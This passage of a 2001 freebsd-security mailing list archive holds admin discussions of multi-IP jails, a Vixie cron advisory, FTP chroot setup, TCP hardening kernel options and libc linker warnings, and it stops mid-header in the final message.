<20010508145846.B74154@moo.udder.org> Mail-Followup-To: Attila Nagy , freebsd-security@freebsd.org References: <20010507132904.E33043@moo.udder.org> <20010508200734.B61277-100000@scribble.fsn.hu> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <20010508200734.B61277-100000@scribble.fsn.hu>; from bra@fsn.hu on Tue, May 08, 2001 at 08:09:36PM +0200 Organization: Quiknet Inc. Roseville, CA X-Operating-System: FreeBSD moo.udder.org 3.5-STABLE i386 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Atilla: I use Apache with mod_vhost_alias. I have two IPs bound for all of the regular sites, plus each SSL key I have requires its own IP. This immediately throws the use of jails away for now. However, I use the two IPs for mod_vhost_alias liek this: 1. point domain.com to one ip 2. point www.domain.com to another 3. Set two different VirtualDocumentRoot's so that both www.domain.com and domain.com pull up the same site. ie: VirtualDocumentRoot /rz/webs/%2.1/%2/public_html will pull up www.domain.com and VirtualDocumentRoot /rz/webs/%1.1/%0/public_html will pull up domain.com The configuration makes the apache config a lot cleaner, especially when hosting thousands of sites. You may be able to do this some other way, but that's what I'm doing now. Regards, Dave On Tue, May 08, 2001 at 08:09:36PM +0200, Attila Nagy wrote: > Hello, > > > Yeah, it would be nice if you could bind the jail to a list of IPs > > or whatever. It seems like it would be the kind of functionality that > > would be desired by more people than just be. Right now, it's the > > only thing preventing me from moving anything over to a jail. Almost > > every service I run needs more than one IP.My $0.02. > I misunderstood hte original question, I thought of a name based apache > vhost running on multiple IPs, not IP based vhosts... > > -------------------------------------------------------------------------- > Attila Nagy e-mail: Attila.Nagy@fsn.hu > Budapest Polytechnic (BMF.HU) @work: +361 210 1415 (194) > H-1084 Budapest, Tavaszmezo u. 15-17. cell.: +3630 306 6758 > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue May 8 15: 4:13 2001 Delivered-To: freebsd-security@freebsd.org Received: from sol.serv.u-szeged.hu (sol.serv.u-szeged.hu [160.114.51.3]) by hub.freebsd.org (Postfix) with ESMTP id 6622337B423 for ; Tue, 8 May 2001 15:04:07 -0700 (PDT) (envelope-from sziszi@petra.hos.u-szeged.hu) Received: from petra.hos.u-szeged.hu by sol.serv.u-szeged.hu (8.9.3+Sun/SMI-SVR4) id AAA15542; Wed, 9 May 2001 00:04:05 +0200 (MEST) Received: from sziszi by petra.hos.u-szeged.hu with local (Exim 3.12 #1 (Debian)) id 14xFaQ-0002XN-00 for ; Wed, 09 May 2001 00:04:06 +0200 Date: Wed, 9 May 2001 00:04:06 +0200 From: Szilveszter Adam To: security@FreeBSD.ORG Subject: Re: Fwd: Vixie cron vulnerability Message-ID: <20010509000406.C7798@petra.hos.u-szeged.hu> Mail-Followup-To: Szilveszter Adam , security@FreeBSD.ORG References: <20010508201307.A2613@petra.hos.u-szeged.hu> <20010508144020.C2823@xor.obsecurity.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <20010508144020.C2823@xor.obsecurity.org>; from kris@obsecurity.org on Tue, May 08, 2001 at 02:40:20PM -0700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Tue, May 08, 2001 at 02:40:20PM -0700, Kris Kennaway wrote: > On Tue, May 08, 2001 at 08:13:07PM +0200, Szilveszter Adam wrote: > > Hello, > > > > I hate to disturb, but... > > > > I cannot reproduce this, but... are we affected? This looks like rather > > new... > > I checked this when I first heard about it and we don't seem to be. I > don't even know where that version came from, it might be a > linux-originated thing. > > Kris Well the version is surely Debian: p1 stands for patchlevel 1, I guess. The crontab on one of our Linux boxen was already updated and it produced exactly the same result as the one on -CURRENT: a shell wrapper suid me:-) Cool. Maybe you (kris) should inform BUGTRAQ that we are (as usual) exempt from the excitement that running vulnerable systems entails... On a semi-related note: I found no good way of finding out what version of cron we have. Last time when there was an exploit I had to check ident(1) lines IIRC. Does any of you know of a better way? -- Regards: Szilveszter ADAM Szeged University Szeged Hungary To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue May 8 18: 2:32 2001 Delivered-To: freebsd-security@freebsd.org Received: from softweyr.com (mail.dobox.com [208.187.122.44]) by hub.freebsd.org (Postfix) with ESMTP id 25E2237B422 for ; Tue, 8 May 2001 18:02:30 -0700 (PDT) (envelope-from wes@softweyr.com) Received: from localhost ([127.0.0.1] helo=softweyr.com ident=025f3eed5c4fc085f0fb64df616aaf9d) by softweyr.com with esmtp (Exim 3.16 #1) id 14xIN9-0000LH-00; Tue, 08 May 2001 19:02:35 -0600 Message-ID: <3AF8972B.BD18C1E7@softweyr.com> Date: Tue, 08 May 2001 19:02:35 -0600 From: Wes Peters Organization: Softweyr LLC X-Mailer: Mozilla 4.75 [en] (X11; U; Linux 2.2.12 i386) X-Accept-Language: en MIME-Version: 1.0 To: Crist Clark Cc: freebsd-security@FreeBSD.ORG Subject: Re: reverse or not References: <3AF6E858.77E9B72A@globalstar.com> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Crist Clark wrote: > > Wes Peters wrote: > > > > Sheldon Hearn scribed: > > > > > > That's not what I'm suggesting. People were talking about /etc/hosts vs > > > DNS. I'm saying that > > > > > > 1) DNS servers shouldn't answer questions about the loopback > > > network. > > > > > > 2) Hosts should have hostnames for the loopback network > > > hardwired into /etc/hosts. > > > > 3) /etc/host.conf should always have hosts listed before > > bind, to be sure that you get your local definitions > > *first*. > > I was thinking of applications like sendmail(8) that don't bother with > the local resolver and really like to go straight to DNS. Netscape. Grrrr. -- "Where am I, and what am I doing in this handbasket?" Wes Peters Softweyr LLC wes@softweyr.com http://softweyr.com/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue May 8 20:54:14 2001 Delivered-To: freebsd-security@freebsd.org Received: from fledge.watson.org (fledge.watson.org [204.156.12.50]) by hub.freebsd.org (Postfix) with ESMTP id BA51D37B422 for ; Tue, 8 May 2001 20:54:09 -0700 (PDT) (envelope-from robert@fledge.watson.org) Received: from fledge.watson.org (robert@fledge.pr.watson.org [192.0.2.3]) by fledge.watson.org (8.11.3/8.11.3) with SMTP id f493s4f79948; Tue, 8 May 2001 23:54:04 -0400 (EDT) (envelope-from robert@fledge.watson.org) Date: Tue, 8 May 2001 23:54:04 -0400 (EDT) From: Robert Watson X-Sender: robert@fledge.watson.org To: Dave Whitaker Cc: freebsd-security@freebsd.org Subject: Re: Jails and FreeBSD4.3 In-Reply-To: <20010507121223.C33043@moo.udder.org> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Mon, 7 May 2001, Dave Whitaker wrote: > I recently installed FreeBSD 4.3, specifically wanting to mess with > jails. Everything appears to work fine, except I use apache with > mod_vhost_alias, and proftpd hosting several anonymous ftp sites. I > need to get the jail to bind to many IPs, rather than just one. Is > there any way to do this, or would anyone be willing to provide me with > a patch to do so? I've already responded to this to some extent by private e-mail, but since I just caught up with it on the security mailing list, I'll give a quick response here also. Right now, the jail() code in FreeBSD 4.3-STABLE supports binding only a single IP address to a jail. This was by design, as Poul-Henning points out. Due to the way in which jail IP address scoping is performed, there are actually several limitations to removing this restriction, although with some caveats, it can be done with a pretty small patch. The difficulty in removing the limit lies in that jail does not truly polyinstantiate the IP address/port namespace, it merely scopes and modifies the socket calls made by processes in a jail. In particular, it blocks the ability to bind an IP address not associated with the jail, and it performs a conversion of 127.0.0.1 as the target address to the IP associated with the jail. Similarly, if INADDR_ANY is requested as the source address, the jail code forceably selects the jail IP as the source address, instead of using routing information. You'll notice that some applications expecting to use 127.0.0.1 in specific ways will fail as a result of this behavior. When moving to multiple IP addresses on a jail, an additional inconsistency is introduced: the process is not permitted to use INADDR_ANY since there isn't true polyinstantiation, leaving few useful choices for wildcard sockets. In the multiple IP code I'm working with right now, the practical implication is that processes attempting to bind all IPs using INADDR_ANY in fact bind only the first IP. For applications carefully selecting their IP, such as Apache running with virtual domains and specifically bound IPs, this is not a problem. For others, such as inetd, it may mean that only the first IP gets these services. As has been discussed, I'm in the process of implementing a "jailNG" that changes some of the underlying model assumptions of the jail code. These changes are targetted only at 5.0-CURRENT right now, as a primary concern in writing the code has been to migrate to a model that provides compatibility with the SMPng code, and hence support for fine-grained synchronization primitives. Right now, I have no plans to backport the code to the RELENG_4 branch, as it deprecates the existing jail() system call, thus breaking the ABI (which is generally a no-no on a minor release branch). This is because the management model is modifies such that jails are now explicitly created, joined, and destroyed, as they have unique jail "names". This allows jails to be individually managed using the jail.instance.(name).* sysctl namespace, which was an important goal of the new implementation. The existing jail(8) code uses implicit naming, provides no fine-grained management, but does offer automatic garbage collection when the last process in a jail dies. I've posted some initial jailNG patches to http://www.watson.org/~robert/jailng/. I have additional support code going into the tree shortly that permits per-jail securelevels, and once the support code is in the base tree, I'll update jailNG to handle that. I'm of mixed feelings about adding multiple-IP support to the code: it is very much in demand, but further reduces compatibility (broken INADDR_ANY), and introduces a harder optimization problem (scaling to 10,000 IPs per-jail is not as easy as scaling to two). While it is theoretically possible to backport the changes to RELENG_4 (and not very hard at that), and I might even be willing to do that (probably as a for-pay thing since I don't see it as a priority), I think the changes of it making its way into the tree before 5.0-RELEASE are highly unlikely, due to ABI/API changes, etc. Robert N M Watson FreeBSD Core Team, TrustedBSD Project robert@fledge.watson.org NAI Labs, Safeport Network Services To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed May 9 0: 8:39 2001 Delivered-To: freebsd-security@freebsd.org Received: from mailo.vtcif.telstra.com.au (mailo.vtcif.telstra.com.au [202.12.144.17]) by hub.freebsd.org (Postfix) with ESMTP id 5AC7237B422 for ; Wed, 9 May 2001 00:08:36 -0700 (PDT) (envelope-from Sami.Gounder@team.telstra.com) Received: (from uucp@localhost) by mailo.vtcif.telstra.com.au (8.8.2/8.6.9) id RAA24875 for ; Wed, 9 May 2001 17:08:34 +1000 (EST) Received: from maili.vtcif.telstra.com.au(202.12.142.17) via SMTP by mailo.vtcif.telstra.com.au, id smtpdqyC_4_; Wed May 9 17:08:07 2001 Received: (from uucp@localhost) by maili.vtcif.telstra.com.au (8.8.2/8.6.9) id RAA07572 for ; Wed, 9 May 2001 17:08:07 +1000 (EST) Received: from localhost(127.0.0.1), claiming to be "mail.cdn.telstra.com.au" via SMTP by localhost, id smtpd0ccG5F; Wed May 9 17:07:43 2001 Received: from ntmsg0028.corpmail.telstra.com.au (ntmsg0028.corpmail.telstra.com.au [192.168.174.24]) by mail.cdn.telstra.com.au (8.8.2/8.6.9) with ESMTP id RAA20787 for ; Wed, 9 May 2001 17:07:42 +1000 (EST) Received: by ntmsg0028.corpmail.telstra.com.au with Internet Mail Service (5.5.2650.21) id ; Wed, 9 May 2001 17:06:27 +1000 Message-ID: <695D40B5EDD1D3118AB900508B08E9C8020EA60C@NTMSG0084> From: "Gounder, Sami [IBM GSA]" To: "'freebsd-security@FreeBSD.org'" Subject: Preventing FTP user accessing other directories Date: Wed, 9 May 2001 17:06:25 +1000 MIME-Version: 1.0 X-Mailer: Internet Mail Service (5.5.2650.21) Content-Type: text/plain Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org We need to setup FTP for users to copy files from our UNIX box. Is there a way to restrict each user to a directory and sub-directories below it without removing OTHERS permission everywhere else? Sami To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed May 9 0:23: 3 2001 Delivered-To: freebsd-security@freebsd.org Received: from ns.morning.ru (ns.morning.ru [195.161.98.5]) by hub.freebsd.org (Postfix) with ESMTP id 7484537B422 for ; Wed, 9 May 2001 00:23:00 -0700 (PDT) (envelope-from poige@morning.ru) Received: from NIC1 (195.161.98.236.morning.ru [195.161.98.236]) by ns.morning.ru (8.9.3/8.9.3) with ESMTP id PAA08914; Wed, 9 May 2001 15:22:33 +0800 (KRAST) (envelope-from poige@morning.ru) Date: Wed, 9 May 2001 15:25:31 +0700 From: Igor Podlesny X-Mailer: The Bat! (v1.52 Beta/7) UNREG / CD5BF9353B3B7091 Organization: Morning Network X-Priority: 3 (Normal) Message-ID: <6693506465.20010509152531@morning.ru> To: "Gounder, Sami [IBM GSA]" Cc: "'freebsd-security@FreeBSD.org'" Subject: Re: Preventing FTP user accessing other directories In-Reply-To: <695D40B5EDD1D3118AB900508B08E9C8020EA60C@NTMSG0084> References: <695D40B5EDD1D3118AB900508B08E9C8020EA60C@NTMSG0084> MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org are you aware of CHROOT capabilities? lots of FTP daemons can lock user inside chrooted area... ProFTPd also allows easy configuration similar to Apache syntax rules for every dir and so on. > We need to setup FTP for users to copy files from our UNIX box. Is there a > way to restrict each user to a directory and sub-directories below it > without removing OTHERS permission everywhere else? > Sami -- Igor mailto:poige@morning.ru To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed May 9 0:25:42 2001 Delivered-To: freebsd-security@freebsd.org Received: from unix-shells.com (handi6-212-144-244-007.arcor-ip.net [212.144.244.7]) by hub.freebsd.org (Postfix) with ESMTP id 22C5637B422 for ; Wed, 9 May 2001 00:25:35 -0700 (PDT) (envelope-from bjoern@loenneker.com) Received: (from root@localhost) by unix-shells.com (8.11.3/8.11.3) id f497PNL57845; Wed, 9 May 2001 09:25:23 +0200 (CEST) (envelope-from bjoern@loenneker.com) Received: from unix-shells.com (nobody@localhost [127.0.0.1]) by unix-shells.com (8.11.3/8.11.3av) with ESMTP id f497PK357837; Wed, 9 May 2001 09:25:20 +0200 (CEST) (envelope-from bjoern@loenneker.com) Message-ID: <84388618.989393120543.JavaMail.nobody@localhost> Date: Wed, 9 May 2001 09:25:20 +0200 (CEST) From: =?ISO-8859-1?Q?Bj=F6rn_L=F6nneker?= To: Sami.Gounder@team.telstra.com Subject: RE: Preventing FTP user accessing other directories Cc: freebsd-security@freebsd.org Mime-Version: 1.0 Content-Type: multipart/mixed; boundary=84390859.989393120398.JavaMail.nobody.unix-shells.com X-Mailer: WebMail/Java v0.7.6, SendMessage plugin v1.8 X-Virus-Scanned: by AMaViS perl-10 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org --84390859.989393120398.JavaMail.nobody.unix-shells.com Content-Type: text/plain; charset="utf-8" Content-Transfer-Encoding: quoted-printable You wrote: > We need to setup FTP for users to copy files from our UNIX box. Is there a > way to restrict each user to a directory and sub-directories below it > without removing OTHERS permission everywhere else? > Sami > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message -- you can restrict users to their home-directories by adding their groupname to /etc/ftpchroot. If your users are, for example, all part of the "users" group, put "@users" into /etc/ftpchroot. --84390859.989393120398.JavaMail.nobody.unix-shells.com-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed May 9 0:26: 5 2001 Delivered-To: freebsd-security@freebsd.org Received: from ringworld.nanolink.com (ringworld.nanolink.com [195.24.48.13]) by hub.freebsd.org (Postfix) with SMTP id 16E4637B422 for ; Wed, 9 May 2001 00:26:02 -0700 (PDT) (envelope-from roam@orbitel.bg) Received: (qmail 10712 invoked by uid 1000); 9 May 2001 07:25:31 -0000 Date: Wed, 9 May 2001 10:25:31 +0300 From: Peter Pentchev To: "Gounder, Sami [IBM GSA]" Cc: Igor Podlesny , "'freebsd-security@FreeBSD.org'" Subject: Re: Preventing FTP user accessing other directories Message-ID: <20010509102531.A3400@ringworld.oblivion.bg> Mail-Followup-To: "Gounder, Sami [IBM GSA]" , Igor Podlesny , "'freebsd-security@FreeBSD.org'" References: <695D40B5EDD1D3118AB900508B08E9C8020EA60C@NTMSG0084> <6693506465.20010509152531@morning.ru> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <6693506465.20010509152531@morning.ru>; from poige@morning.ru on Wed, May 09, 2001 at 03:25:31PM +0700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Wed, May 09, 2001 at 03:25:31PM +0700, Igor Podlesny wrote: > > are you aware of CHROOT capabilities? lots of FTP daemons can lock > user inside chrooted area... ProFTPd also allows easy configuration > similar to Apache syntax rules for every dir and so on. > > > We need to setup FTP for users to copy files from our UNIX box. Is there a > > way to restrict each user to a directory and sub-directories below it > > without removing OTHERS permission everywhere else? If you're using the FTP server that comes with FreeBSD (/usr/libexec/ftpd), do 'man ftpd' and look for 'chroot' or '/etc/ftpchroot'. G'luck, Peter -- Do you think anybody has ever had *precisely this thought* before? To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed May 9 2:29:23 2001 Delivered-To: freebsd-security@freebsd.org Received: from alpha.netvision.net.il (alpha.netvision.net.il [194.90.1.13]) by hub.freebsd.org (Postfix) with ESMTP id 1402637B42C for ; Wed, 9 May 2001 02:29:17 -0700 (PDT) (envelope-from lirandb@netvision.net.il) Received: from a ([213.57.143.184]) by alpha.netvision.net.il (8.9.3/8.8.6) with SMTP id MAA19918 for ; Wed, 9 May 2001 12:29:14 +0300 (IDT) Message-ID: <002601ba1df7$4da07940$b88f39d5@a> From: "Retal" To: Subject: Some Kernel options Date: Tue, 9 May 1995 12:26:09 +0200 MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="----=_NextPart_000_0023_01BA1E08.10F6EEA0" X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.00.2919.6600 X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2919.6600 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org This is a multi-part message in MIME format. ------=_NextPart_000_0023_01BA1E08.10F6EEA0 Content-Type: text/plain; charset="windows-1255" Content-Transfer-Encoding: quoted-printable I could not have wondered but..Its only me or other people compiling = their kernel with this options: options KBD_INSTALL_CDEV # install a CDEV entry in /dev options TCP_DROP_SYNFIN #drop TCP packets with SYN+FIN options TCP_RESTRICT_RST #restrict emission of TCP RST options ICMP_BANDLIM = =20 Those options has any effect? i use them for months but i havent seen = any difference between my other machines. BTW: if i add TCP_DROP_SYNFIN, it should effect setup option in my = firewall ?if it is, how ? Thanks, -Liran Dahan- [lirandb@netvision.net.il] ------=_NextPart_000_0023_01BA1E08.10F6EEA0 Content-Type: text/html; charset="windows-1255" Content-Transfer-Encoding: quoted-printable
I could not have wondered but..Its only = me or other=20 people compiling their kernel with this options:
options        =20 KBD_INSTALL_CDEV        # install a = CDEV=20 entry in /dev
options         = TCP_DROP_SYNFIN         #drop = TCP=20 packets with = SYN+FIN
options        =20 TCP_RESTRICT_RST        #restrict = emission of=20 TCP RST
options        =20 ICMP_BANDLIM          &= nbsp;           &n= bsp;           &nb= sp;           &nbs= p;   =20
 
Those options has any effect? i use = them for months=20 but i havent seen any difference between my other machines.
 
BTW: if i add TCP_DROP_SYNFIN, it should effect setup option in my = firewall=20 ?if it is, how ?
 
Thanks,
 
 
-Liran Dahan- [lirandb@netvision.net.il]
 
------=_NextPart_000_0023_01BA1E08.10F6EEA0-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed May 9 2:34:19 2001 Delivered-To: freebsd-security@freebsd.org Received: from obsecurity.dyndns.org (adsl-63-207-60-108.dsl.lsan03.pacbell.net [63.207.60.108]) by hub.freebsd.org (Postfix) with ESMTP id 8A3F337B50E for ; Wed, 9 May 2001 02:34:10 -0700 (PDT) (envelope-from kris@obsecurity.org) Received: by obsecurity.dyndns.org (Postfix, from userid 1000) id D890C678BA; Wed, 9 May 2001 02:34:09 -0700 (PDT) Date: Wed, 9 May 2001 02:34:09 -0700 From: Kris Kennaway To: Retal Cc: freebsd-security@FreeBSD.ORG Subject: Re: Some Kernel options Message-ID: <20010509023409.A33253@xor.obsecurity.org> References: <002601ba1df7$4da07940$b88f39d5@a> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-md5; protocol="application/pgp-signature"; boundary="TB36FDmn/VVEgNH/" Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <002601ba1df7$4da07940$b88f39d5@a>; from lirandb@netvision.net.il on Tue, May 09, 1995 at 12:26:09PM +0200 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org --TB36FDmn/VVEgNH/ Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable On Tue, May 09, 1995 at 12:26:09PM +0200, Retal wrote: Fix your clock ^^^^ > I could not have wondered but..Its only me or other people compiling > their kernel with this options: > options KBD_INSTALL_CDEV # install a CDEV entry in /dev > options TCP_DROP_SYNFIN #drop TCP packets with SYN+FIN > options TCP_RESTRICT_RST #restrict emission of TCP RST > options ICMP_BANDLIM = =20 >=20 > Those options has any effect? i use them for months but i havent > seen any difference between my other machines. Um, you're not going to see the effect of these options unless you look. They work as intended - it seems you're expecting them to make some magical difference to your machine, which isn't the case. Kris --TB36FDmn/VVEgNH/ Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.5 (FreeBSD) Comment: For info see http://www.gnupg.org iD8DBQE6+Q8RWry0BWjoQKURAgfmAJ9IjcLNn6Mji6NLJmy8SVDnbDUywwCeKU8l BwyvuogOQxIg1oINsStukbE= =yjaJ -----END PGP SIGNATURE----- --TB36FDmn/VVEgNH/-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed May 9 2:43:19 2001 Delivered-To: freebsd-security@freebsd.org Received: from probity.mcc.ac.uk (probity.mcc.ac.uk [130.88.200.94]) by hub.freebsd.org (Postfix) with ESMTP id 06B7437B422 for ; Wed, 9 May 2001 02:43:16 -0700 (PDT) (envelope-from rasputin@freebsd-uk.eu.org) Received: from dogma.freebsd-uk.eu.org ([130.88.200.97] ident=root) by probity.mcc.ac.uk with esmtp (Exim 2.05 #4) id 14xQV0-000EN8-00 for security@freebsd.org; Wed, 9 May 2001 10:43:14 +0100 Received: (from rasputin@localhost) by dogma.freebsd-uk.eu.org (8.11.1/8.11.1) id f499hD147381 for security@freebsd.org; Wed, 9 May 2001 10:43:13 +0100 (BST) (envelope-from rasputin) Date: Wed, 9 May 2001 10:43:13 +0100 From: Rasputin To: security@freebsd.org Subject: setkey(3) not present in the system Message-ID: <20010509104313.A47276@dogma.freebsd-uk.eu.org> Reply-To: Rasputin Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 1.0.1i Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Morning all. I'm trying to port a WAP gateway to BSD, I've managed to get it to roll a binary, but want to quench these warnings before I submit it. (see bottom) I know how to sort out mktemp() and gets(), anyone know where f_prealloc() lives? Anyway, the main reason I mailed this list is the 4 crypto functions don't seem to be implemented on my box - is that just me? If so, how do I get them into the c library? I'm not a USA resident , and used to have a line saying that in make.conf back in 4.0-RELEASE. Since then I've removed the line. Anybody know where I can get these functions? Thanks. /usr/lib/libc.so: WARNING! setkey(3) not present in the system! /usr/lib/libc.so: warning: this program uses gets(), which is unsafe. /usr/lib/libc.so: warning: mktemp() possibly used unsafely; consider using mkstemp() /usr/lib/libc.so: WARNING! des_setkey(3) not present in the system! /usr/lib/libc.so: WARNING! encrypt(3) not present in the system! /usr/lib/libc.so: warning: tmpnam() possibly used unsafely; consider using mkstemp() /usr/lib/libc.so: warning: this program uses f_prealloc(), which is stupid. /usr/lib/libc.so: WARNING! des_cipher(3) not present in the system! -- When God endowed human beings with brains, He did not intend to guarantee them. Rasputin :: Jack of All Trades - Master of Nuns :: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed May 9 2:57:18 2001 Delivered-To: freebsd-security@freebsd.org Received: from rafiu.psi-domain.co.uk (rafiu.psi-domain.co.uk [212.87.84.199]) by hub.freebsd.org (Postfix) with ESMTP id 7856E37B422 for ; Wed, 9 May 2001 02:57:15 -0700 (PDT) (envelope-from heckfordj@psi-domain.co.uk) Received: from smtp.psi-domain.co.uk (mail.trident-uk.co.uk [195.166.16.10]) by rafiu.psi-domain.co.uk (Postfix) with SMTP id 629B0402EC6 for ; Wed, 9 May 2001 10:52:38 +0100 (BST) Date: Wed, 9 May 2001 11:55:58 +0100 From: Jamie Heckford To: freebsd-security@freebsd.org Subject: Re: Some Kernel options Message-ID: <20010509115558.C4995@storm.psi-domain.co.uk> Reply-To: heckfordj@psi-domain.co.uk References: <002601ba1df7$4da07940$b88f39d5@a> <20010509023409.A33253@xor.obsecurity.org> Mime-Version: 1.0 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 8bit In-Reply-To: <20010509023409.A33253@xor.obsecurity.org>; from kris@obsecurity.org on Wed, May 09, 2001 at 10:34:09 +0100 X-Mailer: Balsa 1.1.1 Lines: 51 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Some can help against portscans and DoS attacks. Not really useful if your not connected to a publically addressable IP address, or if your not on a Medium/Large LAN with people on the network who may possibly attack your box. Jamie On 2001.05.09 10:34 Kris Kennaway wrote: > On Tue, May 09, 1995 at 12:26:09PM +0200, Retal wrote: > > Fix your clock ^^^^ > > > I could not have wondered but..Its only me or other people compiling > > their kernel with this options: > > options KBD_INSTALL_CDEV # install a CDEV entry in /dev > > options TCP_DROP_SYNFIN #drop TCP packets with SYN+FIN > > options TCP_RESTRICT_RST #restrict emission of TCP RST > > options ICMP_BANDLIM > > > > > Those options has any effect? i use them for months but i havent > > seen any difference between my other machines. > > Um, you're not going to see the effect of these options unless you > look. They work as intended - it seems you're expecting them to make > some magical difference to your machine, which isn't the case. > > Kris > -- Jamie Heckford Network Operations Manager Psi-Domain - Innovative Linux Solutions. Ask Us How. FreeBSD - The power to serve Join our mailing list and stay informed by emailing majordomo@psi-domain.co.uk with the line: subscribe collective ===================================== email: heckfordj@psi-domain.co.uk web: http://www.psi-domain.co.uk/ tel: +44 (0)1737 789 246 fax: +44 (0)1737 789 245 mobile: +44 (0)7866 724 224 ===================================== To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed May 9 3:39:42 2001 Delivered-To: freebsd-security@freebsd.org Received: from obsecurity.dyndns.org (adsl-63-207-60-108.dsl.lsan03.pacbell.net [63.207.60.108]) by hub.freebsd.org (Postfix) with ESMTP id C92C137B422 for ; Wed, 9 May 2001 03:39:38 -0700 (PDT) (envelope-from kris@obsecurity.org) Received: by obsecurity.dyndns.org (Postfix, from userid 1000) id E014F678BA; Wed, 9 May 2001 03:39:31 -0700 (PDT) Date: Wed, 9 May 2001 03:39:31 -0700 From: Kris Kennaway To: Rasputin Cc: security@FreeBSD.ORG Subject: Re: setkey(3) not present in the system Message-ID: <20010509033931.A34710@xor.obsecurity.org> References: <20010509104313.A47276@dogma.freebsd-uk.eu.org> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-md5; protocol="application/pgp-signature"; boundary="bg08WKrSYDhXBjb5" Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <20010509104313.A47276@dogma.freebsd-uk.eu.org>; from rara.rasputin@virgin.net on Wed, May 09, 2001 at 10:43:13AM +0100 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org --bg08WKrSYDhXBjb5 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable On Wed, May 09, 2001 at 10:43:13AM +0100, Rasputin wrote: >=20 > Morning all. > I'm trying to port a WAP gateway to BSD, I've managed to get it to roll > a binary, but want to quench these warnings before I submit it. > (see bottom) You get these warnings when you link incorrectly against libc. It doesnt mean the program uses these functions. Kris --bg08WKrSYDhXBjb5 Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.5 (FreeBSD) Comment: For info see http://www.gnupg.org iD8DBQE6+R5iWry0BWjoQKURAhUVAKC5FWY55sXiMxxsmZOwq/Smes4SBACfbXve +eqcNKedsKWCpkjseNOjC9E= =X/fu -----END PGP SIGNATURE----- --bg08WKrSYDhXBjb5-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed May 9 3:39:51 2001 Delivered-To: freebsd-security@freebsd.org Received: from mr200.netcologne.de (mr200.netcologne.de [194.8.194.109]) by hub.freebsd.org (Postfix) with ESMTP id 6A34737B422 for ; Wed, 9 May 2001 03:39:48 -0700 (PDT) (envelope-from pherman@frenchfries.net) Received: from husten.security.at12.de (dial-213-168-92-247.netcologne.de [213.168.92.247]) by mr200.netcologne.de (Mirapoint) with ESMTP id AFF49586; Wed, 9 May 2001 